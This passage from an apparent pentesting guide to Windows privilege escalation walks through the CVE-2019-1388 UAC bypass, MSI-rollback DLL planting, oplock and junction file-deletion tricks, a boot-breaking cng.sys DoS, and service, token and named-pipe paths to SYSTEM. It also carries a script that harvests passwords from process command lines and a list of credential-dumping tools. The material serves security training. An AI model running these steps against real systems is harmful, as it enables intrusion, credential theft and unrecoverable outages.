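    re.compile(r"runas(?:\.exe)?\s.*?/user:\S+\s+(?P<secret>[^\s\"\\/]\S*)", re.I),
    # net use X: \\server\share PASSWORD /user:NAME
    re.compile(r"net(?:\.exe)?\s+use\s+\S+\s+\\\\\S+\s+(?P<secret>\S+)\s+/user:", re.I),
    # -p SECRET / -P SECRET / --password SECRET (crackmapexec, SessionGopher, sqlcmd, ...)
    re.compile(r"(?:^|\s)(?:-p|--password)\s+(?P<secret>[^\s\"']+)", re.I),
    # /p:SECRET, /password:SECRET and key=value forms such as password=SECRET or pwd=SECRET
    re.compile(r"(?:(?:^|\s)/p(?:assword)?:|\b(?:password|passwd|pwd|pass)=)(?P<secret>[^\s\"';&]+)", re.I),
]


def find_secrets(cmdline):
    """Secret-looking tokens in one command line, in the order the patterns match them."""
    return [m.group("sec" "ret") for pat in CRED_PATTERNS for m in pat.finditer(cmdline)]


def redact(cmdline):
    for secret in find_secrets(cmdline):
        cmdline = cmdline.replace(secret, "***")
    return cmdline


def new_since(previous, current):
    """Command lines present now that were absent from the previous snapshot."""
    seen = set(previous)
    return [c for c in current if c and c not in seen]


def review(previous, current):
    """(redacted command line, secrets) for every new process that carries a credential."""
    hits = []
    for cmdline in new_since(previous, current):
        secrets = find_secrets(cmdline)
        if secrets:
            hits.append((redact(cmdline), secrets))
    return hits


def snapshot_windows():
    """Live command lines via WMI (Windows only), the same source the PowerShell loop polls."""
    script = "Get-CimInstance Win32_Process | ForEach-Object { $_.CommandLine }"
    out = subprocess.run(["powershell", "-NoProfile", "-Command", script],
                         capture_output=True, text=True, check=True).stdout
    return [line.strip() for line in out.splitlines() if line.strip()]


# Constructed snapshots: two steady-state processes, then a mapped drive, an inline runas password,
# a SessionGopher run, a runas relying on saved credentials and a harmless PowerShell command.
PREVIOUS = [r"C:\Windows\explorer.exe", "svchost.exe -k netsvcs"]
CURRENT = PREVIOUS + [
    r"C:\Windows\System32\cmd.exe /c net use Z: \\fileserver\backup Winter2024! /user:CORP\svc_backup",
    r'C:\Windows\System32\runas.exe /env /noprofile /user:CORP\admin Hunter2 "C:\Tools\agent.exe"',
    r"C:\Tools\sgopher.exe -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss",
    r'C:\Windows\System32\runas.exe /savecred /user:WORKGROUP\Administrator "\\fileserver\share\tool.exe"',
    r"powershell.exe -NoProfile -Command Get-ChildItem -Path C:\inetpub",
]

if __name__ == "__main__":
    for line, secrets in review(PREVIOUS, CURRENT):
        print(f"{len(secrets)} secret(s): {line}")
```

Feed review() with two consecutive snapshot_windows() results inside a sleep loop to get the redacted hit list instead of the raw Compare-Object diff.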
Stealing passwords from processes
From Low Priv User to NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass
If you have access to the graphical interface (via console or RDP) and UAC is enabled, in some versions of Microsoft Windows it's possible to run a terminal or any other process such as "NT\AUTHORITY SYSTEM" from an unprivileged user.
This makes it possible to escalate privileges and bypass UAC at the same time with the same vulnerability. Additionally, there is no need to install anything and the binary used during the process is signed and issued by Microsoft.
Some of the affected systems are the following:
SERVER
======
Windows 2008r2 7601 ** link OPENED AS SYSTEM **
Windows 2012r2 9600 ** link OPENED AS SYSTEM **
Windows 2016 14393 ** link OPENED AS SYSTEM **
Windows 2019 17763 link NOT opened
WORKSTATION
===========
Windows 7 SP1 7601 ** link OPENED AS SYSTEM **
Windows 8 9200 ** link OPENED AS SYSTEM **
Windows 8.1 9600 ** link OPENED AS SYSTEM **
Windows 10 1511 10240 ** link OPENED AS SYSTEM **
Windows 10 1607 14393 ** link OPENED AS SYSTEM **
Windows 10 1703 15063 link NOT opened
Windows 10 1709 16299 link NOT opened
To exploit this vulnerability, it's necessary to perform the following steps:
1) Right click on the HHUPD.EXE file and run it as Administrator.
2) When the UAC prompt appears, select "Show more details".
3) Click "Show publisher certificate information".
4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.
5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.
6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.
7) You now will have an "NT\AUTHORITY SYSTEM" command prompt.
8) Remember to cancel setup and the UAC prompt to return to your desktop.
You have all the necessary files and information in the following GitHub repository:
https://github.com/jas502n/CVE-2019-1388
From Administrator Medium to High Integrity Level / UAC Bypass
Read this to learn about Integrity Levels:
Then read this to learn about UAC and UAC bypasses:
From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP
The technique described in this blog post with exploit code available here.
The attack starts by abusing the Windows Installer rollback feature to replace legitimate files with malicious ones during the uninstall process. For this, the attacker needs to create a malicious MSI installer that will be used to hijack the C:\Config.Msi folder, which will later be used by Windows Installer to store rollback files during the uninstall of other MSI packages, where the rollback files would have been modified to contain the malicious payload.
The summarized technique is the following:
- Stage 1 – Preparing for the Hijack (leave C:\Config.Msi empty)
- Step 1: Install the MSI
  - Create an .msi that installs a harmless file (e.g., dummy.txt) into a writable folder (TARGETDIR).
  - Mark the installer as "UAC Compliant", so a non-admin user can run it.
  - Keep a handle open to the file after install.
- Step 2: Begin Uninstall
  - Uninstall the same .msi.
  - The uninstall process starts moving files to C:\Config.Msi and renaming them to .rbf files (rollback backups).
  - Poll the open file handle using GetFinalPathNameByHandle to detect when the file becomes C:\Config.Msi\<random>.rbf.
- Step 3: Custom Syncing
  - The .msi includes a custom uninstall action (SyncOnRbfWritten) that:
    - Signals when the .rbf has been written.
    - Then waits on another event before continuing the uninstall.
- Step 4: Block Deletion of .rbf
  - When signaled, open the .rbf file without FILE_SHARE_DELETE; this prevents it from being deleted.
  - Then signal back so the uninstall can finish.
  - Windows Installer fails to delete the .rbf, and because it cannot delete all contents, C:\Config.Msi is not removed.
- Step 5: Manually Delete .rbf
  - You (the attacker) delete the .rbf file manually.
  - Now C:\Config.Msi is empty, ready to be hijacked.
At this point, trigger the SYSTEM-level arbitrary folder delete vulnerability to delete C:\Config.Msi.
- Stage 2 – Replacing Rollback Scripts with Malicious Ones
- Step 6: Recreate C:\Config.Msi with Weak ACLs
  - Recreate the C:\Config.Msi folder yourself.
  - Set weak DACLs (e.g., Everyone:F), and keep a handle open with WRITE_DAC.
- Step 7: Run Another Install
  - Install the .msi again, with:
    - TARGETDIR: a writable location.
    - ERROROUT: a variable that triggers a forced failure.
  - This install will be used to trigger rollback again, which reads .rbs and .rbf.
- Step 8: Monitor for .rbs
  - Use ReadDirectoryChangesW to monitor C:\Config.Msi until a new .rbs appears.
  - Capture its filename.
- Step 9: Sync Before Rollback
  - The .msi contains a custom install action (SyncBeforeRollback) that:
    - Signals an event when the .rbs is created.
    - Then waits before continuing.
- Step 10: Reapply Weak ACL
  - After receiving the .rbs created event:
    - Windows Installer reapplies strong ACLs to C:\Config.Msi.
    - But since you still have a handle with WRITE_DAC, you can reapply weak ACLs again.
  ACLs are only enforced on handle open, so you can still write to the folder.
- Step 11: Drop Fake .rbs and .rbf
  - Overwrite the .rbs file with a fake rollback script that tells Windows to:
    - Restore your .rbf file (the malicious DLL) into a privileged location (e.g., C:\Program Files\Common Files\microsoft shared\ink\HID.DLL).
    - Drop your fake .rbf containing a malicious SYSTEM-level payload DLL.
- Step 12: Trigger the Rollback
  - Signal the sync event so the installer resumes.
  - A type 19 custom action (ErrorOut) is configured to intentionally fail the install at a known point.
  - This causes rollback to begin.
- Step 13: SYSTEM Installs Your DLL
  - Windows Installer:
    - Reads your malicious .rbs.
    - Copies your .rbf DLL into the target location.
    - You now have your malicious DLL in a SYSTEM-loaded path.
- Final Step: Execute SYSTEM Code
  - Run a trusted auto-elevated binary (e.g., osk.exe) that loads the DLL you hijacked.
  - Boom: your code is executed as SYSTEM.
From Arbitrary File Delete/Move/Rename to SYSTEM EoP
The main MSI rollback technique (the one above) assumes you can delete a whole folder (e.g., C:\Config.Msi). But what if your vulnerability only allows arbitrary file deletion?
You can exploit NTFS internals: every folder has a hidden alternate data stream called:
C:\SomeFolder::$INDEX_ALLOCATION
This stream stores the index metadata of the folder.
So, if you delete the ::$INDEX_ALLOCATION stream of a folder, NTFS removes the whole folder from the filesystem.
You can do this using standard file deletion APIs like:
DeleteFileW(L"C:\\Config.Msi::$INDEX_ALLOCATION");
Even though you are calling a file delete API, it deletes the folder itself.
From Folder Contents Delete to SYSTEM EoP
What if your primitive does not allow you to delete arbitrary files/folders, but it does allow deletion of the contents of an attacker-controlled folder?
- Step 1: Set up a bait folder and file
  - Create: C:\temp\folder1
  - Inside it: C:\temp\folder1\file1.txt
- Step 2: Place an oplock on file1.txt
  - The oplock pauses execution when a privileged process tries to delete file1.txt.
// pseudo-code
RequestOplock("C:\\temp\\folder1\\file1.txt");
WaitForDeleteToTriggerOplock();
- Step 3: Trigger the SYSTEM process (e.g., SilentCleanup)
  - This process scans folders (e.g., %TEMP%) and tries to delete their contents.
  - When it reaches file1.txt, the oplock triggers and hands control to your callback.
- Step 4: Inside the oplock callback – redirect the deletion
  - Option A: Move file1.txt elsewhere
    - This empties folder1 without breaking the oplock.
    - Do not delete file1.txt directly, as that would release the oplock early.
  - Option B: Convert folder1 into a junction:
# folder1 is now a junction to \RPC Control (non-filesystem namespace)
mklink /J C:\temp\folder1 \\?\GLOBALROOT\RPC Control
  - Option C: Create a symlink in \RPC Control:
# Make file1.txt point to a sensitive folder stream
CreateSymlink("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION")
This targets the NTFS internal stream that stores folder metadata; deleting it deletes the folder.
- Step 5: Release the oplock
  - The SYSTEM process continues and tries to delete file1.txt.
  - But now, because of the junction + symlink, it actually deletes: C:\Config.Msi::$INDEX_ALLOCATION
Result: C:\Config.Msi is deleted by SYSTEM.
From Arbitrary Folder Create to Permanent DoS
Exploit a primitive that lets you create an arbitrary folder as SYSTEM/admin, even if you cannot write files or set weak permissions.
Create a folder (not a file) with the name of a critical Windows driver, e.g.:
C:\Windows\System32\cng.sys
- This path normally corresponds to the cng.sys kernel-mode driver.
- If you pre-create it as a folder, Windows fails to load the actual driver on boot.
- Then, Windows tries to load cng.sys during boot.
- It sees the folder, fails to resolve the actual driver, and crashes or halts boot.
- There is no fallback, and no recovery without external intervention (e.g., boot repair or disk access).
From High Integrity to System
New service
If you are already running a High Integrity process, the path to SYSTEM can be easy just by creating and executing a new service:
sc create newservicename binPath= "C:\windows\system32\notepad.exe"
sc start newservicename
tip
When creating a service binary make sure it's a valid service or that the binary performs the necessary actions quickly, as it will be killed in 20s if it is not a valid service.
AlwaysInstallElevated
From a High Integrity process you could try to enable the AlwaysInstallElevated registry entries and install a reverse shell using a .msi wrapper.
More information about the registry keys involved and how to install a .msi package here.
High + SeImpersonate privilege to System
You can find the code here.
From SeDebug + SeImpersonate to Full Token privileges
If you have those token privileges (probably you will find this in an already High Integrity process), you will be able to open almost any process (not protected processes) with the SeDebug privilege, copy the token of the process, and create an arbitrary process with that token.
Using this technique, usually any process running as SYSTEM with all the token privileges is selected (yes, you can find SYSTEM processes without all the token privileges).
You can find an example of code executing the proposed technique here.
Named Pipes
This technique is used by meterpreter to escalate in getsystem. The technique consists of creating a pipe and then creating/abusing a service to write to that pipe. Then, the server that created the pipe, using the SeImpersonate privilege, will be able to impersonate the token of the pipe client (the service) and obtain SYSTEM privileges.
If you want to learn more about named pipes you should read this.
If you want to read an example of how to go from high integrity to System using named pipes you should read this.
Dll Hijacking
If you manage to hijack a dll being loaded by a process running as SYSTEM you will be able to execute arbitrary code with those permissions. Therefore Dll Hijacking is also useful for this kind of privilege escalation and, moreover, it is far easier to achieve from a high integrity process, as it will have write permissions on the folders used to load dlls.
You can learn more about Dll hijacking here.
From Administrator or Network Service to System
- https://github.com/sailay1996/RpcSsImpersonator
- https://decoder.cloud/2020/05/04/from-network-service-to-system/
- https://github.com/decoder-it/NetworkServiceExploit
From LOCAL SERVICE or NETWORK SERVICE to full privs
Read: https://github.com/itm4n/FullPowers
More help
Useful tools
Best tool to look for Windows local privilege escalation vectors: WinPEAS
PS
PrivescCheck
PowerSploit-Privesc(PowerUP) -- Check for misconfigurations and sensitive files (check here). Detected.
JAWS -- Check for some possible misconfigurations and gather info (check here).
privesc -- Check for misconfigurations
SessionGopher -- Extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information. Use -Thorough locally.
Invoke-WCMDump -- Extracts credentials from Credential Manager. Detected.
DomainPasswordSpray -- Spray gathered passwords across the domain
Inveigh -- Inveigh is a PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool.
WindowsEnum -- Basic privesc Windows enumeration
Sherlock -- Find known privesc vulnerabilities (DEPRECATED in favour of Watson)
WINspect -- Local checks (needs Admin rights)
Exe
Watson -- Find known privesc vulnerabilities (needs to be compiled using VisualStudio) (precompiled)
SeatBelt -- Enumerates the host looking for misconfigurations (more an info-gathering tool than privesc) (needs to be compiled) (precompiled)
LaZagne -- Extracts credentials from many applications (precompiled exe on github)
SharpUP -- Port of PowerUp to C#
Beroot -- Check for misconfigurations (precompiled executable on github). Not recommended. It doesn't work well on Win10.
Windows-Privesc-Check -- Check for possible misconfigurations (exe built from python). Not recommended. It doesn't work well on Win10.
Bat
winPEASbat -- Tool created based on this post (does not need accesschk to work properly but it can use it).
Local
Windows-Exploit-Suggester -- Reads the output of systeminfo and recommends working exploits (local python)
Windows Exploit Suggester Next Generation -- Reads the output of systeminfo and recommends working exploits (local python)
Meterpreter
multi/recon/local_exploit_suggestor
You have to compile the project using the correct version of .NET (see this). To see the installed version of .NET on the victim host you can do:
C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line
References
- http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html
- https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
- https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
- https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md
- https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
- HTB Reaper: Format-string leak + stack BOF → VirtualAlloc ROP (RCE) and kernel token theft